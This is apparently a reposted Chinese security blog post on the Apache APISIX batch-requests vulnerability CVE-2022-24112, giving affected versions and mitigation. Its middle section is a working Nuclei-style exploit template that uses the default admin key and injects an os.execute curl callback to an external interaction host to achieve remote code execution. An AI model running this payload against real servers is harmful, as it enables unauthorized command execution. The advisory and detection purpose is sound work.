Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)

渗透技巧 2年前 (2022) admin
909 0 0


在 Apache APISIX 2.12.1 之前的版本中(不包含 2.12.1 和 2.10.4),启用 Apache APISIX batch-requests 插件之后,会存在改写 X-REAL-IP header 风险。


  • 攻击者通过 batch-requests 插件绕过 Apache APISIX 数据面的 IP 限制。如绕过 IP 黑白名单限制。

  • 如果用户使用 Apache APISIX 默认配置(启用 Admin API ,使用默认 Admin Key 且没有额外分配管理端口),攻击者可以通过 batch-requests 插件调用 Admin API 。

这个漏洞本质利用和 CVE-2021-45232 类似,都是绕过授权或未授权,来执行恶意的 route 里的 filter_func 或者 script 来执行命令


  • X-Real-IP 的值可以是,localhost 或者 2130706433

  • pipeline 是必须项,以下为其 body 部分的值说明

  • method 固定为 PUT

  • uri 必须存在,这也是 exp 后需要访问来触发的 URL

  • plugins,upstream/upstream_id,service_id 这三个必须存在其中一个,详情可以参考官方文档

如果 service_id 不可用 可以替换成 "upstream":{"type":"roundrobin","nodes":{"httpbin.org:80":1}}

id: CVE-2022-24112
info: name: Apache APISIX apisix/batch-requests RCE description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. author: Mr-xn severity: critical reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 - https://www.openwall.com/lists/oss-security/2022/02/11/3 - https://twitter.com/sirifu4k1/status/1496043663704858625 - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
tags: cve,cve2022,apache,rce,apisix classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2022-24112 cwe-id: CWE-290
requests: - raw: - | POST /apisix/batch-requests HTTP/1.1 Host: {{Host}}:9080 Content-Type: application/json Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"headers":{"X-Real-IP":"","Content-Type":"application/json"},"timeout":1500,"pipeline":[{"method":"PUT","path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1","body":"{rn "name": "test", "method": ["GET"],rn "uri": "/api/test",rn "upstream":{"type":"roundrobin","nodes":{"httpbin.org:80":1}}rn,rn"filter_func": "function(vars) os.execute('curl {{randstr}}.{{interactsh-url}}'); return true end"}"}]} - | GET /api/test HTTP/1.1 Host: {{Host}}:9080 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close redirects: false
matchers-condition: and req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" # - "status_code_2 == 404" - 'contains(body_1, "{{randstr}}")' # - 'contains(body_1, ""status":200,"reason":"OK"}")' condition: and - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"


Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)

Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)


  • Apache APISIX 1.3 ~ 2.12.1 之间的所有版本(不包含 2.12.1 )

  • Apache APISIX 2.10.0 ~ 2.10.4 LTS 之间的所有版本 (不包含 2.10.4)


  • 该问题目前已在 2.12.1 和 2.10.4 版本中得到解决,请尽快更新至相关版本。

  • 在受影响的 Apache APISIX 版本中,

  • 可以对 conf/config.yaml 和 conf/config-default.yaml 文件显式注释掉 batch-requests,并且重启 Apache APISIX 即可规避此次风险。


Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)

Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)


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原文始发于微信公众号(鹏组安全):Apache APISIX 存在改写 X-REAL-IP header (CVE-2022-24112)

版权声明:admin 发表于 2022年2月28日 上午12:01。
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